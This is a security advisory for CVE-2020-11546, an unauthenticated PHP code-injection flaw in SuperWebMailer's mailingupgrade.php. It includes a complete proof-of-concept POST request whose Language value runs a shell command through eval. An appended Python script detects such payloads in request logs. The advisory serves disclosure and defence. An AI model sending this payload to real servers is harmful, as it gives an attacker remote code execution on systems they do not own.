Advisory: SuperWebMailer < 7.40.0.01550 Unauthenticated Remote Code Execution (CVE-2020-11546)

Versions of SuperWebMailer prior to 7.40.0.01550 are affected by a remote code execution (RCE) vulnerability. The application processes the Language variable without sufficient validation and passes it internally into an eval(), which allows an unauthenticated attacker to execute arbitrary PHP code in the context of the web server (CWE-94). According to the vendor, the vulnerability was fixed in version 7.40.0.01550 (8 April 2020).

Detailed Security Advisory

Advisory ID: TO-2020-001
Product: SuperWebMailer
Vendor: Mirko Böer Softwareentwicklungen, Leipzig
Tested Version: 7.21.0.01526
Fixed Version: 7.40.0.01550 (released 2020-04-08)
Vulnerability Type: Unauthenticated Remote PHP Code Injection
CVSS Risk: 10.0
CVSSv3: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Mitigation: Installation of the software upgrade provided by the vendor
CWE Reference: CWE-94
CVE Reference: CVE-2020-11546
Authors: Tobias Györfi and Dimitri Lesy, Thinking Objects GmbH

Overview

SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the "Language" parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this to execute arbitrary PHP code in the webserver's context.

Proof of Concept

The following request triggers the execution of "ls -lah" on the remote system:

POST /mailingupgrade.php HTTP/1.1
Host: XXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: XXXXXXXXX/mailingupgrade.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: XXXXXXXXX
Connection: close
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXX
Upgrade-Insecure-Requests: 1

step=4&Language=de%7b$%7bsystem(%22ls%20-alh%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E


Server response:


Remediation

Installation of the software upgrade version 7.40.0.01550 provided by the vendor.
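Added example, not part of the advisory: a Python check that a log-review script or WAF rule could apply to captured mailingupgrade.php POST bodies. It URL-decodes the body, validates the Language field against a strict allowlist of locale codes (the allowlist pattern is an assumption, not SuperWebMailer's own validation), and separately flags PHP's `{$`/`${` interpolation syntax, which is what the proof-of-concept request above relies on. The sample bodies are constructed, apart from the one taken from the proof of concept.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed sample POST bodies as they might appear in a request log.
SAMPLE_BODIES = [
    # Benign request with a plain locale code (constructed)
    "step=4&Language=de&RegName=abc&RegNumber=12345&NextBtn=Weiter+%3E",
    # The proof-of-concept body from the advisory above
    "step=4&Language=de%7b$%7bsystem(%22ls%20-alh%22)%7d%7d"
    "&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E",
    # Benign request with a region locale (constructed)
    "step=4&Language=en_US&RegName=abc&RegNumber=1&NextBtn=Weiter+%3E",
]

# Assumed allowlist for a language value: "de", "en", optionally with "_US"-style region.
LOCALE_RE = re.compile(r"^[a-z]{2}(_[A-Z]{2})?$")

# PHP variable interpolation inside a double-quoted string: "{$" or "${".
INTERPOLATION_RE = re.compile(r"\{\$|\$\{")


def language_value(body: str) -> Optional[str]:
    """Return the URL-decoded Language field of a form body, or None if absent."""
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("Language")
    return values[0] if values else None


def is_safe_language(value: str) -> bool:
    """Strict allowlist check; this, not a blocklist, is what closes CWE-94 here."""
    return LOCALE_RE.fullmatch(value) is not None


def classify(body: str) -> str:
    """Classify one body as 'ok', 'missing', 'interpolation' or 'reject'."""
    value = language_value(body)
    if value is None:
        return "missing"
    if is_safe_language(value):
        return "ok"
    # Distinguish the eval-injection pattern from any other unexpected value.
    if INTERPOLATION_RE.search(value):
        return "interpolation"
    return "reject"


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(f"{classify(body):13s} Language={language_value(body)!r}")
```

Any value that is not "ok" would be rejected by the allowlist alone; the "interpolation" label only makes a review of historical traffic easier.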

Disclosure Timeline

2020-03-27: Vulnerability discovered
2020-03-30: Vulnerability reported to vendor
2020-03-30: Vendor response
2020-04-04: CVE reserved
2020-07-06: Verification that the vulnerability no longer exists in version 7.50.0.01560
2020-07-14: Vulnerability disclosed

References

[1] Advisory URL: https://blog.to.com/advisory-superwebmailer-cve-2020-11546
[2] Superwebmailer Website: https://www.superwebmailer.de/

Disclaimer

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on blog.to.com.

Copyright: Creative Commons – Attribution (by) – Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
